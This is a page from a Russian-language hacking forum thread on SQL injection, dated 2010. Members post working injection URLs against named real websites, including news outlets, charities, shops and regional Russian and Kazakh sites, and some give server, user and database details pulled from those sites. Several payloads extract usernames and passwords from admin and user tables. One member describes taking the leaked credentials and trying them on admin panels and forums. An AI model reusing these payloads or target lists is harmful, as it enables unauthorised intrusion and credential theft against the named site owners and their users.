SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.frankenmuthnews.com/?page_id=1+and+1=0+union+select+1,version()+--+

    http://couriernews.com/story.php?ID=-25977+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12+--+
    ТИЦ : 10

    http://www.jonesborosun.com/stories.php?ID=-1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12+--+
    ТИЦ : 10


    http://spinach7.com/signature/sig-stories.php?id=584+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users+limit+0,1+--+

    http://www.lookoutnewspaper.com/top-stories.php?id=308'+and+1=0+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10+--+
    ТИЦ : 10

    http://www.gundam-wing-universe.net/fanfiction/stories.php?id=1573&chapter=1+and+1=0+UnIon+selECt+1,2,3,4,group_concat(schema_name),6,7,8,9+from+information_schema.schemata+--+
    ТИЦ : 10 PR: 1

    http://www.apiequalityla.org/stories.php?id=5+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10+--+

    http://www.morganhabitat.org/stories.php?ID=27'+and+1=0+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
    PR: 3

    http://www.equineramblersuk.co.uk/horse-riding-stories.php?id=2'+and+1=0+UnIon+selECt+1,2,group_concat(schema_name),4,5,6,7,8,9,10,11+from+information_schema.schemata+--+
    ТИЦ : 10

    http://www.hivaidsproviders.org/worldaidsday/stories.php?id=2'+and+1=0+union+select+1,group_concat(schema_name),3,4,5,6+froM+information_schema.schemata+--+
    PR: 1
     
    #13121 tracy, 29 Sep 2010
    Last edited: 29 Sep 2010
    1 person likes this.
  2. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    http://shelterbox.org.uk/deployment_details.php?id=-136+union+select+1,2,3,group_concat(AdminName,char(58),AdminPwd,char(58),AdminAdmins),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+Admin+--
     
    _________________________
  3. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    http://badoff.ru/category1488?vendorid=-1+union+select+table_name+from%20information_schema.tables--
     
  4. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.financialexpress.com/budget08/story.php?id=-279345 union select null,null,table_name,null,null,null,null,null from information_schema.tables limit 1 offset 0--
    PostgreSQL 8.2.0
     
    2 people like this.
  5. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    721
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.climateactiontracker.org/country.php?id=-2103+UNION+SELECT+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6--
    Username: [email protected]
    Version: 4.1.22-log
    Database: usr_ncf285_1

    Google PR: 6


    Code:
    http://www.internationalstudents.org/survival-grocery-paying.php?idlv2=5&idlv3=-37+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5--
    [email protected]:4.0.
    выдало только это!

    Google PR: 6
     
    #13125 av1, 29 Sep 2010
    Last edited: 29 Sep 2010
  6. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Шопы:

    Code:
    http://www.leonnorell.com/detail.php?id=-419 union select 1,2,3,4,group_concat(concat(table_name,0x3a,table_rows)separator 0x3c62723e),6,7,8,9,0,11,12,13,14,15,16,17,18 from information_schema.tables--+
    Code:
    http://www.logi-libros.com/ficha.php?id=-1980 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+
     
  7. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    http://orbita-auto.ru/index.php?mode=news&id=3001+and+1=0+union+select+1,2,concat_ws%280x3a,email,level,pass%29,4,5,6,7,8,9,10,11,12,13+from+users--

    уже все пароли и логины вылезли

    эмейл это логин

    забераем
     
  8. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87

    3 мускул ^__^
     
    #13128 -PRIVAT-, 29 Sep 2010
    Last edited: 29 Sep 2010
  9. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://ultraweb.spb.ru/ind.php?pn=5&id_categ=-12+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+

    5.0.91-community:ultraweb_board:ultraweb_ultra@localhost
    ТИЦ: 10
     
  10. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    http://www.kinolumiere.com/?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6--
     
  11. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://banki.volgograda.ru/index.php?id=-23+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    Code:
    http://www.pogoda.ua/index.php?id=-23+union+select+1,concat(0x3a,password,login),3,4,5+from+users--

    Code:
    http://parovoz.com/regio/index.php?ID=-611+union+select+group_concat(table_name),2+from+information_schema.tables--
     
    #13131 Gedj, 30 Sep 2010
    Last edited: 30 Sep 2010
  12. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://www.croata.hr/detail/detail.php?artikl=889+AnD+row(1,2)in(select+count(*),CoNCaT((select+TabLE_NAmE+from+information_schema.%60tables%60+LiMIT+0,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.%60tables%60+x+GrOuP+by+a)
     
  13. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    не подходит пасс и логин

    http://www.anatili-almaty.kz/admin.php
     
  14. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    http://turrus.kz/forum
    http://turrus.kz/forum/admin

    админку не нашел сайта
    зато есть форум, пароли на форум не подходят
     
    #13134 Lasteeck, 30 Sep 2010
    Last edited by a moderator: 30 Sep 2010
  15. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    PHP:
    http://www.laboratoriosys.es/nueva/pop.php?id=-53+union+select+1,concat(usuario,0x3a,clave),3,4,5,6+from+usuario-- 
     
  16. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.uavtoterm.ru/news.php?id=9+and+1=0+union+select+1,concat_ws(0x3a,name,password,fullname,mail),3,4,5,6+from+users+limit+0,1+--+
    ТИЦ: 20

    http://www.automzsa.ru/autofurgons.php?id=29+and+1=0+union+select+1,2,group_concat(table_name+separator+0x3c62723e),4,5,6,7+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ: 40

    http://www.ural-tuning.ru/catalog_dor.php?id=50+and+1=0+union+select+1,2,version()+--+
    ТИЦ: 20

    http://www.tgauto.ru/automobiles.php?id=12+and+1=0+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15+--+
    ТИЦ: 30

    standart-ural.ru/materials.php?gr=1+and+1=0+union+select+group_concat(table_name),2+from+information_schema.tables+Where+table_schema=database()+--+
    ТИЦ: 20 PR: 1

    http://www.ural-arz.ru/kapremount_auto.php?id=9+and+1=0+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ: 20
     
    1 person likes this.
  17. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Sambir.org

    http://www.sambir.org/?page=oput_all&id_o_z=-11+and+1=2+union+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5+--

    version : 5.0.91-community-log
    user : sambiri_sambiri@localhost
    database : sambiri_sambir
    os : pc-linux-gnu

    http://www.sambir.org/?page=oput_all&id_o_z=-11+and+1=2+union+select+1,concat_ws(0x3a,login,password),3,4,5+from+users+limit+1+offset+2+--
     
    1 person likes this.
  18. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    Code:
    http://spring74.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
    Code:
    http://allgamers.in/video/video/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12
    Code:
    http://patriot38.ru/component/jomtube/video/index.php?view=videos&type=member&user_id=-10+union+select+1,2,3,4,5,
     
    #13138 ubi, 1 Oct 2010
    Last edited: 1 Oct 2010
  19. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.mmotor.ru/news/?id=-26+union+select+1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6+--
    4.0.27-max-log:[email protected]:streetwa_mmot:unknown-freebsd4.7
     
  20. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    hi from VITAL

    www.tellico4x4.com/index.php?manufacturers_id=-289'+union+select+1,version(),3,4%23
     
    #13140 sabe, 1 Oct 2010
    Last edited: 1 Oct 2010
    1 person likes this.
Thread Status:
Not open for further replies.